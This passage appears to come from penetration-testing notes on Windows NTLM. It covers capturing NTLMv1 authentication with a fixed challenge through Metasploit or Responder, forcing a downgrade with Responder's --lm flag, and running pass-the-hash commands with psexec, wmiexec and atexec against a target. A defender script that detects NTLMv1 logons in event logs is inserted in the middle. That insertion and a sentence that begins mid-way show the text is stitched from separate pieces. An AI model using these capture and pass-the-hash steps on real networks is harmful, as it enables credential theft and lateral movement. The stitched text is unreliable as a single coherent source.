With `metasploit auxiliary/server/capture/smb` or `responder` you can set the authentication challenge to 1122334455667788, capture the authentication attempt, and if it was done using NTLMv1 you will be able to crack it.

If you are using `responder` you could try to **use the flag `--lm`** to try to downgrade the authentication.
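A defender-side check for the NTLMv1 authentication this capture depends on, as an added example that is not part of the original page: it scans exported Security event XML for 4624 logons whose `LmPackageName` is `NTLM V1`. The events, host names and accounts are constructed sample data, and `make_event` and `find_ntlmv1_logons` are names chosen for this example.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

def make_event(event_id, computer, **fields):
    """Build a trimmed Security event in Event Viewer XML form (constructed data)."""
    data = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in fields.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System>'
            f'<EventData>{data}</EventData></Event>')

# Constructed sample: one NTLMv1 logon, one NTLMv2 logon, one Kerberos logon.
SAMPLE_EVENTS = "<Events>" + "".join([
    make_event(4624, "srv01.lab.test", TargetDomainName="LAB",
               TargetUserName="svc_scan", LogonType="3",
               AuthenticationPackageName="NTLM", LmPackageName="NTLM V1",
               WorkstationName="PRN-07", IpAddress="10.0.0.25"),
    make_event(4624, "srv01.lab.test", TargetDomainName="LAB",
               TargetUserName="alice", LogonType="3",
               AuthenticationPackageName="NTLM", LmPackageName="NTLM V2",
               WorkstationName="WS-12", IpAddress="10.0.0.40"),
    make_event(4624, "srv01.lab.test", TargetDomainName="LAB",
               TargetUserName="bob", LogonType="3",
               AuthenticationPackageName="Kerberos", LmPackageName="-",
               WorkstationName="-", IpAddress="10.0.0.41"),
]) + "</Events>"

def find_ntlmv1_logons(xml_text):
    """Return one record per successful logon (4624) that negotiated NTLMv1."""
    hits = []
    for ev in ET.fromstring(xml_text).iterfind("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4624":
            continue
        data = {d.get("Name"): (d.text or "").strip()
                for d in ev.iterfind("e:EventData/e:Data", NS)}
        # LmPackageName is "NTLM V1", "NTLM V2", or "-" for non-NTLM logons.
        if data.get("LmPackageName", "").upper() != "NTLM V1":
            continue
        hits.append({
            "computer": ev.findtext("e:System/e:Computer", namespaces=NS),
            "user": f'{data.get("TargetDomainName", "")}\\{data.get("TargetUserName", "")}',
            "workstation": data.get("WorkstationName", ""),
            "source_ip": data.get("IpAddress", ""),
        })
    return hits

if __name__ == "__main__":
    for hit in find_ntlmv1_logons(SAMPLE_EVENTS):
        print(hit)
```

Any hit identifies a client and account still negotiating NTLMv1 and therefore exposed to the capture described above.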
Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid).

`runas /netonly` trick but you don't need to know the plain-text password).

```
C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected]
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected]
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" [email protected] 'whoami'
```